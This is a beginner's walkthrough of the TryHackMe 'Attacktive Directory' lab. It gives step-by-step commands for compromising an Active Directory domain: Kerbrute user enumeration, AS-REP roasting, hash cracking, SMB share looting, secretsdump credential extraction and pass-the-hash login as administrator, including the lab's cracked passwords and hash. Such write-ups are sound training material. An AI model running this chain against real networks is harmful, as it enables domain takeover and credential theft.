Active Directory enumeration and exploitation for beginners

#beginners #activedirectory #AD #enumeration #exploitation

As you may be aware the latest ( well for a number of years actually) the buzz has been about AD.

Active Directory enumeration and exploitation is a fantastic skill set to possess.

Below are details steps of enumerating AD and then exploiting. Just always remember enum, enum, enum at every stage. There is a quick guide section at bottom of the page if you want quick notes.

Lets begin

1. NMAP scan

we are going to start with an nmap scan

nmap 10.10.61.211 -sV -Pn -A

Lets go through the results:

• port 53 is open, this is very important for AD set ups
• we have a Microsoft IIS running, so no doubt a server with higher privileges and a config file somewhere with credentials
• Port 88 kerberos — means we can enumerate for valid users
• port 389 ldap — we can potentially run ldap tools against it
• ports 135,139,445 — all SMB and RPC ports, perfect for enumerating information from using enum4linux, smbclient, smbmap and more
• Very importantly ports 3389 and 5985 are also open — This means RDP is potentially accessible (if users are part of that particular group) and we can run tools like evil-winrm against port 5985

We have also gathered the following information:

• we know the domain: spookysec.local
• so lets first add this to our /etc/hosts
• it is important to add to /etc/hosts as otherwise you will not get the results intended.

2. Edit /etc/hosts

sudo nano /etc/hosts

3. Enumeration

Our next time to get as much information as possible, ideally we are looking for credentials (long shot i know) but looking for usernames (including the format of the username) is something very possible.

3a. Website Enumeration

Steps:

• check out the website — snoop around
• check out source code — sometimes credentials are left in error
• run a directory scan -may need to run using different wordlists, may also need to specify the extension ie. php, txt etc

3b. SMB/RPC Enumeration

smbmap:

smbmap -H 10.10.61.211

smbclient:

smbclient -L \\\\10.10.61.211\\

enum4linux

enum4linux 10.10.61.211

• information here is quite useful so make note of it.

4. Enum users / password spray

At this stage one of two things will happen:

• you either have some usernames (found from earlier stages)
• or you will be using a username list to find them

As you can imagine the latter is not ideal as lockout policies may stop you in your tracks.

Nevertheless, lets progress — for this I am using a modified list provided by THM.

The tool we will use is called: Kerbrute

Just to note: you can also use crackmapexec and other tools for this stage

4a. Kerbrute

./kerbrute_linux_amd64 userenum -d spookysec.local --dc 10.10.61.211 /tmp/userlist.txt

Whats going on with the command:

• we need to set the “userenum” flag
• -d for domain
• — dc for ip address ( can also insert domain here again)
• and the username list

So a few things should immediately jump out to us

• 1. svc-admin (and the dumped hash)
• 2. backup username
• we can attempt to crack this hash using John, sadly I had no luck
• the main thing is we have some valid usernames including the actual format of names used.

5. Next stage — abuse a feature within Kerberos

Now we have some valid usernames we can password spray using crackmapexec or similar tool, or rather we can use a script from Impacket called GetNPUsers.py.

Why: (source TryHackMe.com)

• we want to abuse a feature within Kerberos with an attack method called ASREPRoasting

What is that: (source TryHackMe.com)

• it is when a user account has the privilege “Does not require Pre-Authentication” set
• meaning — that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account. Thus meaning we can get the user hash!

As it stands we have: svc-admin and backup + others usernames

6. GetNPUsers.py

python3 GetNPUsers.py spookysec.local/ -dc-ip 10.10.61.211 -usersfile /tmp/users_list_example.txt -format john -outputfile /tmp/crackme.txt
python3 GetNPUsers.py spookysec.local/svc-admin -outputfile crackme.txt

• pay attention to the format of the command, as it can be funny and not run as intended. I struggled with using — dc hostname.

• ok that is fine, so that means svc-admin does, so lets check out the output file

• lets use john to crack this hash

7. JtR

john crackme.txt --wordlist=/usr/share/wordlists/rockyou.txt

• brilliant we have a password!

8. Enumeration! (again)

remember what I said at the start, anytime we get some valid credentials we need to go back to square one.

Square one is:

• smbclient
• smbmap
• rdp / winrm attempts
• login portals ? — lets try these credentials

smbmap:

smbmap -u svc-admin -p management2005 -H 10.10.61.211

smbclient:

smbclient -L \\\\10.10.61.211\\ --user svc-admin 
smbclient -L spookysec.local --user svc-admin

Instantly, the backup directory should be sticking out like a sore thumb to us.

9. Enumerating further — for some credentials

Lets check it out, again you can use smbmap/ smbclient and even crackmapexec (CME)

If you intend to use smbclient, you need to remove the -L (as that is for listing) see below the syntax

smbclient \\\\spookysec.local\\backup --user svc-admin 
smbclient \\\\10.10.61.211\\backup --user svc-admin

• if you encounter an error like: “Not enough ‘\’ characters in service” you havent put in enough \\. It should be as shown in above text box.

we find the following in the backup directory share

it looks like it is base64 encoded, lets decode it

echo YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw | base64 -d

looks like we have some credentials for user backup

10. Privileged

It is safe to presume that user backup will have privileged access, I mean why else would it be called backup. It must be backing up important stuff surely.

Since we have the credentials, we can use a tool called Secretsdump.py (from Impacket) to access hashes of the administrator (or similar) account which has full rights over everything on the domain

10a. Secretsdump.py

is a script used to extract credentials and secrets from a system.

sudo python3 secretsdump.py -just-dc backup@spookysec.local

• and provide the password when prompted (note you need to run as sudo)

WOOHOO!!

we have the hash, just you are aware — the hash we require is the second part as shown below (highlighted in burgundy)

What can we do with this:

• we will do something called Pass the Hash (PtH) whereby we just pass this hash directly into the program to gain access to the system as you will see next

11. Pass the Hash (PtH)

How does it all work, lets see — using Evil-winrm

evil-winrm -i 10.10.61.211 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

• notice we have not provided a password, but instead the hash of the user administrator

and there we have it! we are now administrator!

A quick guide:

1. nmap scan — get domain info etc
2. add to /etc/hosts
3. start enumeration — website, smb,rpc,ldap, dns
4. validate usernames -kerbrute or password spray
5. with valid names, next ASREPROAST using GetNPUsers.py script
6. use JtR to crack the hash you find
7. back to square 1: enumerate — using the credentials you have log in via smbclient, smbmap etc for the shares
8. Can you find any useful credentials of privileged account users, if so
9. use secretsdump.py with the new set of credentials as an privileged user will have access to hashes for administrator account
10. using the hash from admin account , log in via RDP or evil-winrm using Pass the Hash

Sources and credits:

huge thanks to TryHackMe on the brilliant Attacktive Directory room